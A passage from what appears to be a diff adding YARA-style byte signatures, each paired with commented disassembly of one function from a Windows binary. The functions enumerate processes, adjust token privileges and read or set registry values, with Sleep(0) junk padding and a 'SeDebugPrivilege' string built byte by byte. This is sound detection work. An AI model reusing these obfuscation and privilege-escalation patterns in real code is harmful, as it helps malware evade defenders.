6A 00 FF D6 6A 00 FF D6 57 FF D5 5F 5E 5D 5B 83 C4 08 C3 } + /* +function at 0x00407970@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - enumerate processes + .text:0x00407970 + .text:0x00407970 FUNC: int cdecl sub_00407970( int arg0, ) [4 XREFS] + .text:0x00407970 + .text:0x00407970 Stack Variables: (offset from initial top of stack) + .text:0x00407970 4: int arg0 + .text:0x00407970 + .text:0x00407970 55 push ebp + .text:0x00407971 8bec mov ebp,esp + .text:0x00407973 53 push ebx + .text:0x00407974 56 push esi + .text:0x00407975 8b3578904000 mov esi,dword [0x00409078] + .text:0x0040797b 57 push edi + .text:0x0040797c 6a00 push 0 + .text:0x0040797e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407980 90 nop + .text:0x00407981 6a00 push 0 + .text:0x00407983 6a02 push 2 + .text:0x00407985 e854080000 call 0x004081de ;kernel32.CreateToolhelp32Snapshot(2,0) + .text:0x0040798a 6a00 push 0 + .text:0x0040798c 8bd8 mov ebx,eax + .text:0x0040798e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407990 90 nop + .text:0x00407991 6828010000 push 296 + .text:0x00407996 e861040000 call 0x00407dfc ;msvcrt.??2@YAPAXI@Z(296) + .text:0x0040799b 83c404 add esp,4 + .text:0x0040799e 8bf8 mov edi,eax + .text:0x004079a0 6a00 push 0 + .text:0x004079a2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079a4 90 nop + .text:0x004079a5 6a00 push 0 + .text:0x004079a7 c70728010000 mov dword [edi],296 + .text:0x004079ad ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079af 90 nop + .text:0x004079b0 6a00 push 0 + .text:0x004079b2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079b4 57 push edi + .text:0x004079b5 53 push ebx + .text:0x004079b6 e81d080000 call 0x004081d8 ;kernel32.Process32First(kernel32.CreateToolhelp32Snapshot(2,0),msvcrt.??2@YAPAXI@Z(296)) + .text:0x004079bb 85c0 test eax,eax + .text:0x004079bd 7476 jz 0x00407a35 + .text:0x004079bf 6a00 push 0 + .text:0x004079c1 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079c3 90 nop + .text:0x004079c4 90 nop + .text:0x004079c5 6a00 push 0 + 
.text:0x004079c7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079c9 8b4d08 mov ecx,dword [ebp + 8] + .text:0x004079cc 8d4724 lea eax,dword [edi + 36] + .text:0x004079cf 51 push ecx + .text:0x004079d0 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004079d6 50 push eax + .text:0x004079d7 e824caffff call 0x00404400 ;sub_00404400(<0x00407996>,arg0) + .text:0x004079dc 85c0 test eax,eax + .text:0x004079de 6a00 push 0 + .text:0x004079e0 751e jnz 0x00407a00 + .text:0x004079e2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079e4 6a00 push 0 + .text:0x004079e6 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079e8 8b5f08 mov ebx,dword [edi + 8] + .text:0x004079eb 90 nop + .text:0x004079ec 57 push edi + .text:0x004079ed e8ee030000 call 0x00407de0 ;msvcrt.??3@YAXPAX@Z(<0x00407996>) + .text:0x004079f2 83c404 add esp,4 + .text:0x004079f5 6a00 push 0 + .text:0x004079f7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004079f9 5f pop edi + .text:0x004079fa 8bc3 mov eax,ebx + .text:0x004079fc 5e pop esi + .text:0x004079fd 5b pop ebx + .text:0x004079fe 5d pop ebp + .text:0x004079ff c3 ret + .text:0x00407a00 loc_00407a00: [1 XREFS] + .text:0x00407a00 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a02 90 nop + .text:0x00407a03 57 push edi + .text:0x00407a04 53 push ebx + .text:0x00407a05 e8c8070000 call 0x004081d2 ;kernel32.Process32Next(<0x00407985>,<0x00407996>) + .text:0x00407a0a 85c0 test eax,eax + .text:0x00407a0c 7427 jz 0x00407a35 + .text:0x00407a0e loc_00407a0e: [1 XREFS] + .text:0x00407a0e 6a00 push 0 + .text:0x00407a10 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a12 90 nop + .text:0x00407a13 8b5508 mov edx,dword [ebp + 8] + .text:0x00407a16 8d4724 lea eax,dword [edi + 36] + .text:0x00407a19 52 push edx + .text:0x00407a1a 50 push eax + .text:0x00407a1b ff1560904000 call dword [0x00409060] ;kernel32.lstrcmpiA(<0x00407996>,arg0) + .text:0x00407a21 85c0 test eax,eax + .text:0x00407a23 7431 jz 0x00407a56 + .text:0x00407a25 90 nop + .text:0x00407a26 6a00 push 0 + .text:0x00407a28 
ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a2a 57 push edi + .text:0x00407a2b 53 push ebx + .text:0x00407a2c e8a1070000 call 0x004081d2 ;kernel32.Process32Next(<0x00407985>,<0x00407996>) + .text:0x00407a31 85c0 test eax,eax + .text:0x00407a33 75d9 jnz 0x00407a0e + .text:0x00407a35 loc_00407a35: [2 XREFS] + .text:0x00407a35 6a00 push 0 + .text:0x00407a37 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a39 90 nop + .text:0x00407a3a 53 push ebx + .text:0x00407a3b ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x00407985>) + .text:0x00407a41 90 nop + .text:0x00407a42 57 push edi + .text:0x00407a43 e898030000 call 0x00407de0 ;msvcrt.??3@YAXPAX@Z(<0x00407996>) + .text:0x00407a48 83c404 add esp,4 + .text:0x00407a4b 6a00 push 0 + .text:0x00407a4d ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a4f 5f pop edi + .text:0x00407a50 5e pop esi + .text:0x00407a51 33c0 xor eax,eax + .text:0x00407a53 5b pop ebx + .text:0x00407a54 5d pop ebp + .text:0x00407a55 c3 ret + .text:0x00407a56 loc_00407a56: [1 XREFS] + .text:0x00407a56 90 nop + .text:0x00407a57 6a00 push 0 + .text:0x00407a59 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a5b 8b5f08 mov ebx,dword [edi + 8] + .text:0x00407a5e 57 push edi + .text:0x00407a5f e87c030000 call 0x00407de0 ;msvcrt.??3@YAXPAX@Z(<0x00407996>) + .text:0x00407a64 83c404 add esp,4 + .text:0x00407a67 6a00 push 0 + .text:0x00407a69 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407a6b 90 nop + .text:0x00407a6c 5f pop edi + .text:0x00407a6d 8bc3 mov eax,ebx + .text:0x00407a6f 5e pop esi + .text:0x00407a70 5b pop ebx + .text:0x00407a71 5d pop ebp + .text:0x00407a72 c3 ret + */ + $c40 = { 55 8B EC 53 56 8B 35 ?? ?? ?? ?? 57 6A 00 FF D6 90 6A 00 6A 02 E8 ?? ?? ?? ?? 6A 00 8B D8 FF D6 90 68 28 01 00 00 E8 ?? ?? ?? ?? 83 C4 04 8B F8 6A 00 FF D6 90 6A 00 C7 07 28 01 00 00 FF D6 90 6A 00 FF D6 57 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 6A 00 FF D6 90 90 6A 00 FF D6 8B 4D ?? 8D 47 ?? 51 8B 0D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 6A 00 75 ?? 
FF D6 6A 00 FF D6 8B 5F ?? 90 57 E8 ?? ?? ?? ?? 83 C4 04 6A 00 FF D6 5F 8B C3 5E 5B 5D C3 FF D6 90 57 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 6A 00 FF D6 90 8B 55 ?? 8D 47 ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 90 6A 00 FF D6 57 53 E8 ?? ?? ?? ?? 85 C0 75 ?? 6A 00 FF D6 90 53 FF 15 ?? ?? ?? ?? 90 57 E8 ?? ?? ?? ?? 83 C4 04 6A 00 FF D6 5F 5E 33 C0 5B 5D C3 90 6A 00 FF D6 8B 5F ?? 57 E8 ?? ?? ?? ?? 83 C4 04 6A 00 FF D6 90 5F 8B C3 5E 5B 5D C3 } + /* +function at 0x00403be0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - modify access privileges + .text:0x00403be0 + .text:0x00403be0 FUNC: int stdcall sub_00403be0( int arg0, int arg1, ) [4 XREFS] + .text:0x00403be0 + .text:0x00403be0 Stack Variables: (offset from initial top of stack) + .text:0x00403be0 8: int arg1 + .text:0x00403be0 4: int arg0 + .text:0x00403be0 -4: int local4 + .text:0x00403be0 -12: int local12 + .text:0x00403be0 -16: int local16 + .text:0x00403be0 -20: int local20 + .text:0x00403be0 + .text:0x00403be0 83ec14 sub esp,20 + .text:0x00403be3 56 push esi + .text:0x00403be4 8b3578904000 mov esi,dword [0x00409078] + .text:0x00403bea 57 push edi + .text:0x00403beb 6a00 push 0 + .text:0x00403bed bf01000000 mov edi,1 + .text:0x00403bf2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403bf4 8d442408 lea eax,dword [esp + 8] + .text:0x00403bf8 50 push eax + .text:0x00403bf9 6a28 push 40 + .text:0x00403bfb ff15d8904000 call dword [0x004090d8] ;kernel32.GetCurrentProcess() + .text:0x00403c01 50 push eax + .text:0x00403c02 ff1510904000 call dword [0x00409010] ;advapi32.OpenProcessToken(kernel32.GetCurrentProcess(),40,local20) + .text:0x00403c08 85c0 test eax,eax + .text:0x00403c0a 750d jnz 0x00403c19 + .text:0x00403c0c 50 push eax + .text:0x00403c0d ffd6 call esi ;kernel32.Sleep(advapi32.OpenProcessToken(<0x00403bfb>,40,local20)) + .text:0x00403c0f 5f pop edi + .text:0x00403c10 33c0 xor eax,eax + .text:0x00403c12 5e pop esi + .text:0x00403c13 83c414 add esp,20 + .text:0x00403c16 c20800 ret 8 + .text:0x00403c19 
loc_00403c19: [1 XREFS] + .text:0x00403c19 8b4c2424 mov ecx,dword [esp + 36] + .text:0x00403c1d 6a00 push 0 + .text:0x00403c1f f7d9 neg ecx + .text:0x00403c21 1bc9 sbb ecx,ecx + .text:0x00403c23 897c2410 mov dword [esp + 16],edi + .text:0x00403c27 83e102 and ecx,2 + .text:0x00403c2a 894c241c mov dword [esp + 28],ecx + .text:0x00403c2e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403c30 8b442420 mov eax,dword [esp + 32] + .text:0x00403c34 8d542410 lea edx,dword [esp + 16] + .text:0x00403c38 52 push edx + .text:0x00403c39 50 push eax + .text:0x00403c3a 6a00 push 0 + .text:0x00403c3c ff1514904000 call dword [0x00409014] ;advapi32.LookupPrivilegeValueA(0,arg0,local12) + .text:0x00403c42 6a00 push 0 + .text:0x00403c44 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403c46 8b542408 mov edx,dword [esp + 8] + .text:0x00403c4a 6a00 push 0 + .text:0x00403c4c 6a00 push 0 + .text:0x00403c4e 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00403c52 6a10 push 16 + .text:0x00403c54 51 push ecx + .text:0x00403c55 6a00 push 0 + .text:0x00403c57 52 push edx + .text:0x00403c58 ff1518904000 call dword [0x00409018] ;advapi32.AdjustTokenPrivileges(0xfefefefe,0,local16,16,0,0) + .text:0x00403c5e 6a00 push 0 + .text:0x00403c60 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403c62 ff15d4904000 call dword [0x004090d4] ;ntdll.RtlGetLastWin32Error() + .text:0x00403c68 85c0 test eax,eax + .text:0x00403c6a 7406 jz 0x00403c72 + .text:0x00403c6c 6a00 push 0 + .text:0x00403c6e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403c70 33ff xor edi,edi + .text:0x00403c72 loc_00403c72: [1 XREFS] + .text:0x00403c72 6a00 push 0 + .text:0x00403c74 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403c76 8b442408 mov eax,dword [esp + 8] + .text:0x00403c7a 50 push eax + .text:0x00403c7b ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00403c81 8bc7 mov eax,edi + .text:0x00403c83 5f pop edi + .text:0x00403c84 5e pop esi + .text:0x00403c85 83c414 add esp,20 + .text:0x00403c88 c20800 ret 8 + */ + 
$c41 = { 83 EC 14 56 8B 35 ?? ?? ?? ?? 57 6A 00 BF 01 00 00 00 FF D6 8D 44 24 ?? 50 6A 28 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 FF D6 5F 33 C0 5E 83 C4 14 C2 08 00 8B 4C 24 ?? 6A 00 F7 D9 1B C9 89 7C 24 ?? 83 E1 02 89 4C 24 ?? FF D6 8B 44 24 ?? 8D 54 24 ?? 52 50 6A 00 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 54 24 ?? 6A 00 6A 00 8D 4C 24 ?? 6A 10 51 6A 00 52 FF 15 ?? ?? ?? ?? 6A 00 FF D6 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A 00 FF D6 33 FF 6A 00 FF D6 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 83 C4 14 C2 08 00 } + /* +function at 0x004063d0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - modify access privileges + .text:0x004063d0 + .text:0x004063d0 FUNC: int msfastcall sub_004063d0( int ecx, int edx, ) [2 XREFS] + .text:0x004063d0 + .text:0x004063d0 Stack Variables: (offset from initial top of stack) + .text:0x004063d0 -4: int local4 + .text:0x004063d0 -5: int local5 + .text:0x004063d0 -6: int local6 + .text:0x004063d0 -7: int local7 + .text:0x004063d0 -8: int local8 + .text:0x004063d0 -9: int local9 + .text:0x004063d0 -10: int local10 + .text:0x004063d0 -11: int local11 + .text:0x004063d0 -12: int local12 + .text:0x004063d0 -13: int local13 + .text:0x004063d0 -14: int local14 + .text:0x004063d0 -15: int local15 + .text:0x004063d0 -16: int local16 + .text:0x004063d0 -17: int local17 + .text:0x004063d0 -18: int local18 + .text:0x004063d0 -19: int local19 + .text:0x004063d0 -20: int local20 + .text:0x004063d0 -24: int local24 + .text:0x004063d0 -32: int local32 + .text:0x004063d0 -36: int local36 + .text:0x004063d0 -40: int local40 + .text:0x004063d0 + .text:0x004063d0 83ec28 sub esp,40 + .text:0x004063d3 56 push esi + .text:0x004063d4 8b3578904000 mov esi,dword [0x00409078] + .text:0x004063da 57 push edi + .text:0x004063db 6a00 push 0 + .text:0x004063dd ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063df ff15d8904000 call dword [0x004090d8] ;kernel32.GetCurrentProcess() + .text:0x004063e5 6a00 push 0 + .text:0x004063e7 8bf8 mov edi,eax + 
.text:0x004063e9 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063eb 8d442408 lea eax,dword [esp + 8] + .text:0x004063ef 50 push eax + .text:0x004063f0 6a28 push 40 + .text:0x004063f2 57 push edi + .text:0x004063f3 ff1510904000 call dword [0x00409010] ;advapi32.OpenProcessToken(kernel32.GetCurrentProcess(),40,local40) + .text:0x004063f9 85c0 test eax,eax + .text:0x004063fb 0f84d8000000 jz 0x004064d9 + .text:0x00406401 6a00 push 0 + .text:0x00406403 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406405 6a00 push 0 + .text:0x00406407 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406409 6a00 push 0 + .text:0x0040640b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040640d 6a00 push 0 + .text:0x0040640f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406411 6a00 push 0 + .text:0x00406413 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406415 6a00 push 0 + .text:0x00406417 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406419 b169 mov cl,105 + .text:0x0040641b b267 mov dl,103 + .text:0x0040641d 884c2425 mov byte [esp + 37],cl + .text:0x00406421 884c2427 mov byte [esp + 39],cl + .text:0x00406425 88542422 mov byte [esp + 34],dl + .text:0x00406429 8854242a mov byte [esp + 42],dl + .text:0x0040642d 8d4c2410 lea ecx,dword [esp + 16] + .text:0x00406431 8d54241c lea edx,dword [esp + 28] + .text:0x00406435 51 push ecx + .text:0x00406436 b065 mov al,101 + .text:0x00406438 52 push edx + .text:0x00406439 6a00 push 0 + .text:0x0040643b c644242853 mov byte [esp + 40],83 + .text:0x00406440 88442429 mov byte [esp + 41],al + .text:0x00406444 c644242a44 mov byte [esp + 42],68 + .text:0x00406449 8844242b mov byte [esp + 43],al + .text:0x0040644d c644242c62 mov byte [esp + 44],98 + .text:0x00406452 c644242d75 mov byte [esp + 45],117 + .text:0x00406457 c644242f50 mov byte [esp + 47],80 + .text:0x0040645c c644243072 mov byte [esp + 48],114 + .text:0x00406461 c644243276 mov byte [esp + 50],118 + .text:0x00406466 c64424346c mov byte [esp + 52],108 + .text:0x0040646b 88442435 mov byte [esp + 53],al + 
.text:0x0040646f 88442437 mov byte [esp + 55],al + .text:0x00406473 c644243800 mov byte [esp + 56],0 + .text:0x00406478 ff1514904000 call dword [0x00409014] ;advapi32.LookupPrivilegeValueA(0,local20,local32) + .text:0x0040647e 85c0 test eax,eax + .text:0x00406480 7440 jz 0x004064c2 + .text:0x00406482 6a00 push 0 + .text:0x00406484 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406486 6a00 push 0 + .text:0x00406488 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040648a 6a00 push 0 + .text:0x0040648c c744241001000000 mov dword [esp + 16],1 + .text:0x00406494 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406496 6a00 push 0 + .text:0x00406498 c744241c02000000 mov dword [esp + 28],2 + .text:0x004064a0 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064a2 6a00 push 0 + .text:0x004064a4 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064a6 8b4c2408 mov ecx,dword [esp + 8] + .text:0x004064aa 6a00 push 0 + .text:0x004064ac 6a00 push 0 + .text:0x004064ae 8d442414 lea eax,dword [esp + 20] + .text:0x004064b2 6a00 push 0 + .text:0x004064b4 50 push eax + .text:0x004064b5 6a00 push 0 + .text:0x004064b7 51 push ecx + .text:0x004064b8 ff1518904000 call dword [0x00409018] ;advapi32.AdjustTokenPrivileges(0xfefefefe,0,local36,0,0,0) + .text:0x004064be 6a00 push 0 + .text:0x004064c0 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064c2 loc_004064c2: [1 XREFS] + .text:0x004064c2 6a00 push 0 + .text:0x004064c4 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064c6 6a00 push 0 + .text:0x004064c8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064ca 8b542408 mov edx,dword [esp + 8] + .text:0x004064ce 52 push edx + .text:0x004064cf ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004064d5 6a00 push 0 + .text:0x004064d7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064d9 loc_004064d9: [1 XREFS] + .text:0x004064d9 6a00 push 0 + .text:0x004064db ffd6 call esi ;kernel32.Sleep(0) + .text:0x004064dd 5f pop edi + .text:0x004064de 5e pop esi + .text:0x004064df 83c428 add esp,40 + 
.text:0x004064e2 c3 ret + */ + $c42 = { 83 EC 28 56 8B 35 ?? ?? ?? ?? 57 6A 00 FF D6 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 8D 44 24 ?? 50 6A 28 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 B1 69 B2 67 88 4C 24 ?? 88 4C 24 ?? 88 54 24 ?? 88 54 24 ?? 8D 4C 24 ?? 8D 54 24 ?? 51 B0 65 52 6A 00 C6 44 24 ?? 53 88 44 24 ?? C6 44 24 ?? 44 88 44 24 ?? C6 44 24 ?? 62 C6 44 24 ?? 75 C6 44 24 ?? 50 C6 44 24 ?? 72 C6 44 24 ?? 76 C6 44 24 ?? 6C 88 44 24 ?? 88 44 24 ?? C6 44 24 ?? 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A 00 FF D6 6A 00 FF D6 6A 00 C7 44 24 ?? 01 00 00 00 FF D6 6A 00 C7 44 24 ?? 02 00 00 00 FF D6 6A 00 FF D6 8B 4C 24 ?? 6A 00 6A 00 8D 44 24 ?? 6A 00 50 6A 00 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 6A 00 FF D6 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 5F 5E 83 C4 28 C3 } + /* +function at 0x00404a90@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - query or enumerate registry value + .text:0x00404a90 + .text:0x00404a90 FUNC: int cdecl sub_00404a90( int arg0, int arg1, int arg2, int arg3, int arg4, int arg5, int arg6, int arg7, ) [2 XREFS] + .text:0x00404a90 + .text:0x00404a90 Stack Variables: (offset from initial top of stack) + .text:0x00404a90 32: int arg7 + .text:0x00404a90 28: int arg6 + .text:0x00404a90 24: int arg5 + .text:0x00404a90 20: int arg4 + .text:0x00404a90 16: int arg3 + .text:0x00404a90 12: int arg2 + .text:0x00404a90 8: int arg1 + .text:0x00404a90 4: int arg0 + .text:0x00404a90 -8: int local8 + .text:0x00404a90 -20: int local20 + .text:0x00404a90 -32: int local32 + .text:0x00404a90 -36: int local36 + .text:0x00404a90 -295: int local295 + .text:0x00404a90 -296: int local296 + .text:0x00404a90 -592: int local592 + .text:0x00404a90 + .text:0x00404a90 55 push ebp + .text:0x00404a91 8bec mov ebp,esp + .text:0x00404a93 6aff push 0xffffffff + .text:0x00404a95 6898924000 push 0x00409298 + .text:0x00404a9a 68907e4000 push 0x00407e90 + .text:0x00404a9f 64a100000000 fs: 
mov eax,dword [0x00000000] + .text:0x00404aa5 50 push eax + .text:0x00404aa6 64892500000000 fs: mov dword [0x00000000],esp + .text:0x00404aad 81ec3c020000 sub esp,572 + .text:0x00404ab3 53 push ebx + .text:0x00404ab4 56 push esi + .text:0x00404ab5 57 push edi + .text:0x00404ab6 33db xor ebx,ebx + .text:0x00404ab8 895de0 mov dword [ebp - 32],ebx + .text:0x00404abb 889ddcfeffff mov byte [ebp - 292],bl + .text:0x00404ac1 b940000000 mov ecx,64 + .text:0x00404ac6 33c0 xor eax,eax + .text:0x00404ac8 8dbdddfeffff lea edi,dword [ebp - 291] + .text:0x00404ace f3ab rep: stosd + .text:0x00404ad0 66ab stosd + .text:0x00404ad2 aa stosb + .text:0x00404ad3 53 push ebx + .text:0x00404ad4 8b3578904000 mov esi,dword [0x00409078] + .text:0x00404ada ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404adc 895dfc mov dword [ebp - 4],ebx + .text:0x00404adf 53 push ebx + .text:0x00404ae0 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404ae2 8d85b4fdffff lea eax,dword [ebp - 588] + .text:0x00404ae8 50 push eax + .text:0x00404ae9 6819000200 push 0x00020019 + .text:0x00404aee 53 push ebx + .text:0x00404aef 8b4d0c mov ecx,dword [ebp + 12] + .text:0x00404af2 51 push ecx + .text:0x00404af3 8b5508 mov edx,dword [ebp + 8] + .text:0x00404af6 52 push edx + .text:0x00404af7 ff1504904000 call dword [0x00409004] ;advapi32.RegOpenKeyExA(arg0,arg1,0,0x00020019,local592) + .text:0x00404afd 85c0 test eax,eax + .text:0x00404aff 53 push ebx + .text:0x00404b00 740b jz 0x00404b0d + .text:0x00404b02 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b04 c745e0ffffffff mov dword [ebp - 32],0xffffffff + .text:0x00404b0b eb74 jmp 0x00404b81 + .text:0x00404b0d loc_00404b0d: [1 XREFS] + .text:0x00404b0d ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b0f 395d24 cmp dword [ebp + 36],ebx + .text:0x00404b12 756d jnz 0x00404b81 + .text:0x00404b14 8b4514 mov eax,dword [ebp + 20] + .text:0x00404b17 3bc3 cmp eax,ebx + .text:0x00404b19 7666 jbe 0x00404b81 + .text:0x00404b1b 83f802 cmp eax,2 + .text:0x00404b1e 7761 ja 0x00404b81 + 
.text:0x00404b20 53 push ebx + .text:0x00404b21 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b23 c745e404010000 mov dword [ebp - 28],260 + .text:0x00404b2a 53 push ebx + .text:0x00404b2b ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b2d 8d45e4 lea eax,dword [ebp - 28] + .text:0x00404b30 50 push eax + .text:0x00404b31 8d8ddcfeffff lea ecx,dword [ebp - 292] + .text:0x00404b37 51 push ecx + .text:0x00404b38 8d5514 lea edx,dword [ebp + 20] + .text:0x00404b3b 52 push edx + .text:0x00404b3c 53 push ebx + .text:0x00404b3d 8b4510 mov eax,dword [ebp + 16] + .text:0x00404b40 50 push eax + .text:0x00404b41 8b8db4fdffff mov ecx,dword [ebp - 588] + .text:0x00404b47 51 push ecx + .text:0x00404b48 ff1508904000 call dword [0x00409008] ;advapi32.RegQueryValueExA(0xfefefefe,arg2,0,arg3,local296,local32) + .text:0x00404b4e 85c0 test eax,eax + .text:0x00404b50 752f jnz 0x00404b81 + .text:0x00404b52 53 push ebx + .text:0x00404b53 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b55 8d95dcfeffff lea edx,dword [ebp - 292] + .text:0x00404b5b 52 push edx + .text:0x00404b5c 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00404b62 e859f9ffff call 0x004044c0 ;sub_004044c0(0,local296) + .text:0x00404b67 50 push eax + .text:0x00404b68 8b4518 mov eax,dword [ebp + 24] + .text:0x00404b6b 50 push eax + .text:0x00404b6c 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00404b72 e8f9fbffff call 0x00404770 ;sub_00404770(arg4,sub_004044c0(0,local296)) + .text:0x00404b77 53 push ebx + .text:0x00404b78 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b7a c745e001000000 mov dword [ebp - 32],1 + .text:0x00404b81 loc_00404b81: [5 XREFS] + .text:0x00404b81 c745fcffffffff mov dword [ebp - 4],0xffffffff + .text:0x00404b88 e81f000000 call 0x00404bac ;sub_00404bac() + .text:0x00404b8d 53 push ebx + .text:0x00404b8e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00404b90 8b45e0 mov eax,dword [ebp - 32] + .text:0x00404b93 8b4df0 mov ecx,dword [ebp - 16] + .text:0x00404b96 64890d00000000 fs: mov dword 
[0x00000000],ecx + .text:0x00404b9d 5f pop edi + .text:0x00404b9e 5e pop esi + .text:0x00404b9f 5b pop ebx + .text:0x00404ba0 8be5 mov esp,ebp + .text:0x00404ba2 5d pop ebp + .text:0x00404ba3 c3 ret + */ + $c43 = { 55 8B EC 6A FF 68 98 92 40 00 68 90 7E 40 00 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC 3C 02 00 00 53 56 57 33 DB 89 5D ?? 88 9D ?? ?? ?? ?? B9 40 00 00 00 33 C0 8D BD ?? ?? ?? ?? F3 AB 66 AB AA 53 8B 35 ?? ?? ?? ?? FF D6 89 5D ?? 53 FF D6 8D 85 ?? ?? ?? ?? 50 68 19 00 02 00 53 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 53 74 ?? FF D6 C7 45 ?? FF FF FF FF EB ?? FF D6 39 5D ?? 75 ?? 8B 45 ?? 3B C3 76 ?? 83 F8 02 77 ?? 53 FF D6 C7 45 ?? 04 01 00 00 53 FF D6 8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 55 ?? 52 53 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF D6 8D 95 ?? ?? ?? ?? 52 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 FF D6 C7 45 ?? 01 00 00 00 C7 45 ?? FF FF FF FF E8 ?? ?? ?? ?? 53 FF D6 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 
5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00404be0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - set registry value + .text:0x00404be0 + .text:0x00404be0 FUNC: int cdecl sub_00404be0( int arg0, int arg1, int arg2, int arg3, int arg4, int arg5, int arg6, ) [6 XREFS] + .text:0x00404be0 + .text:0x00404be0 Stack Variables: (offset from initial top of stack) + .text:0x00404be0 28: int arg6 + .text:0x00404be0 24: int arg5 + .text:0x00404be0 20: int arg4 + .text:0x00404be0 16: int arg3 + .text:0x00404be0 12: int arg2 + .text:0x00404be0 8: int arg1 + .text:0x00404be0 4: int arg0 + .text:0x00404be0 -8: int local8 + .text:0x00404be0 -20: int local20 + .text:0x00404be0 -32: int local32 + .text:0x00404be0 -36: int local36 + .text:0x00404be0 -40: int local40 + .text:0x00404be0 + .text:0x00404be0 55 push ebp + .text:0x00404be1 8bec mov ebp,esp + .text:0x00404be3 6aff push 0xffffffff + .text:0x00404be5 68a8924000 push 0x004092a8 + .text:0x00404bea 68907e4000 push 0x00407e90 + .text:0x00404bef 64a100000000 fs: mov eax,dword [0x00000000] + .text:0x00404bf5 50 push eax + .text:0x00404bf6 64892500000000 fs: mov dword [0x00000000],esp + .text:0x00404bfd 83ec14 sub esp,20 + .text:0x00404c00 53 push ebx + .text:0x00404c01 56 push esi + .text:0x00404c02 57 push edi + .text:0x00404c03 33db xor ebx,ebx + .text:0x00404c05 895de4 mov dword [ebp - 28],ebx + .text:0x00404c08 895dfc mov dword [ebp - 4],ebx + .text:0x00404c0b 8b4520 mov eax,dword [ebp + 32] + 